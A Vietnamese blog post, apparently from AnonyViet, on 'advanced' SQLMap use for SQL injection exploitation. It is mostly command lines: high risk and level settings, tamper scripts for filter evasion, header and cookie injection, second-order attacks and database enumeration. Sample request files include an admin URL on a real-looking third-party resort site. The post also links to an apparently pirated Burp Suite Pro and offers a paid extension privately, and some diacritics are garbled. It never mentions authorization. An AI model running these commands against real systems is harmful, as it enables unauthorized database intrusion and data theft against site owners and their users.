Cách sử dụng SQLMap nâng cao

SQLMap là phần mềm giúp khai thác SQL Injection tự động giúp bạn tiết kiệm thời gian hơn so với khai thác thủ công. Mình đã có hướng dẫn cách sử dụng SQLMap cơ bản, tuy nhiên SQLMap vẫn còn các thông số nâng cao giúp bạn tiết kiệm thời gian khai thác và tăng hiệu quả khai thác hơn. Dưới đây là một số kỹ thuật sử dụng SQLMap nâng cao để bạn khai thác lỗi SQL Injection.

Tham gia kênh Telegram của AnonyViet  👉 Link 👈

Cách sử dụng SQLMap nâng cao

Mình sẽ nói sơ qua về cách cài đặt và sử dụng SQLMap trước:

S dng --batch đ SQLMap chạy tự động và bỏ qua câu hỏi yes/no

S dng *xác định vị trí cần Injection

S dng --string="String_in_the_response" để biết chuỗi nào đã được Injection thành công (True) 


sqlmap -u "https://anonyviet.com/s.php?q=test" -p "q"

sqlmap -r request.txt

sqlmap -m urls.txt

sqlmap -u "http://afine.com/user/*" -H "User-agent: *"

sqlmap -r request.txt --second-order "http://afine.com/avatar"


--random-agent

--batch

--risk=3 --level=5


--proxy=http://127.0.0.1:8080

-v 0
-v 4

--output-dir=sqlmap

--prefix "this_string_must_be_before_injection"

--suffix "--this_string_must_be_at_the_end_of_injection"

sqlmap -u "https://afine.com/s.php?q=1" -p 'q' --eval='q=q.replace(" ","%20")'

--tamper="PATH_OR_NAME_OF_TAMPER_SCRIPT"

-H "Auth_header: secret1" -H "Cookie: auth2=secret2"

python sqlmap.py -r request.txt --random-agent --tamper=space2comment --time-sec=20 --level=5 --risk=3 --dbs --batch

Request dạng POST: Inject vào Username, thì điền dấu * vào username=

POST //index.php?module=user&function=login HTTP/1.1
Host: anonyviet.com

username=*&password=1

Lưu file thành request.txt và đặt chung thư mục sqlmap

Request dạng GET:

GET /admin/index.php?option=tin-sua&tin_id=1
Host: phanthiet.terracottaresort.com

Lưu file thành request.txt và đặt chung thư mục sqlmap

Dùng Burp Suite Pro Extension

Tải Burp Suite Pro ở đây

  • Request Timer – Bắt các gói tin phản hồi theo thời gian (thích hợp với blind sql injection).

Request Timer burp suite

  • Burp Bounty Pro: tự động tìm kiếm lỗ hổng bảo mật bằng Burp Suite Pro (bạn nào cần Extension này thì comment bên dưới mình sẽ gửi riêng)

Burp Bounty Pro

sqlmap burp suite

SQLiPy Sqlmap Integration bup suite

Bất kỳ SQLI nào được tìm thấy bởi SQLiPy sẽ được thêm vào tab Results của Burp Suite.

Payload SQL Injection

Tổng hợp các Payload để test SQL Injection có tại đây: PayloadsAllTheThings.

SQLMap CheatSheel tải ở đây: https://github.com/anonyvietofficial/sqlmap-cheatsheet

Bài viết đạt: 5/5 - (1 bình chọn)

Adblock test (Why?)


Xem Them Chi Tiet

Nhung Mon Do Cong Nghe Duoc Yeu Thich

Do Cong Nghe Phu Kien

0 nhận xét:

Đăng nhận xét